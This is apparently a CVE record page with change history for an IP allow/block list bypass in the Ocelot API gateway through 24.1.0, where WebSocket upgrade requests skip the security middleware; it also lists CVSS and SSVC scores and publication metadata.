Ocelot through 24.1.0, fixed in commit f156fd4, contains a security control bypass vulnerability that allows denied clients to circumvent IP-based access restrictions by sending WebSocket upgrade requests. The WebSocket upgrade pipeline branch configured via MapWhen in OcelotPipelineExtensions.cs omits SecurityMiddleware, causing requests from blocked IP addresses to be proxied to downstream services without enforcement of the configured allow/block list.
History

Wed, 01 Jul 2026 15:30:00 +0000

Type Values Removed Values Added
Metrics ssvc

{'options': {'Automatable': 'yes', 'Exploitation': 'poc', 'Technical Impact': 'partial'}, 'version': '2.0.3'}


Wed, 01 Jul 2026 10:30:00 +0000

Type Values Removed Values Added
First Time appeared Threemammals
Threemammals ocelot
Vendors & Products Threemammals
Threemammals ocelot

Tue, 30 Jun 2026 16:45:00 +0000

Type Values Removed Values Added
Description Ocelot through 24.1.0, fixed in commit f156fd4, contains a security control bypass vulnerability that allows denied clients to circumvent IP-based access restrictions by sending WebSocket upgrade requests. The WebSocket upgrade pipeline branch configured via MapWhen in OcelotPipelineExtensions.cs omits SecurityMiddleware, causing requests from blocked IP addresses to be proxied to downstream services without enforcement of the configured allow/block list.
Title Ocelot - IP Allow/Block List Bypass for WebSocket Upgrade Requests
Weaknesses CWE-288
References
Metrics cvssV3_1

{'score': 9.1, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N'}

cvssV4_0

{'score': 9.3, 'vector': 'CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N'}


cve-icon MITRE

Status: PUBLISHED

Assigner: VulnCheck

Published: 2026-06-30T15:54:59.466Z

Updated: 2026-07-01T15:03:37.053Z

Reserved: 2026-06-29T16:03:38.521Z

Link: CVE-2026-58172

cve-icon Vulnrichment

Updated: 2026-07-01T15:03:33.448Z

cve-icon NVD

No data.

cve-icon Redhat

No data.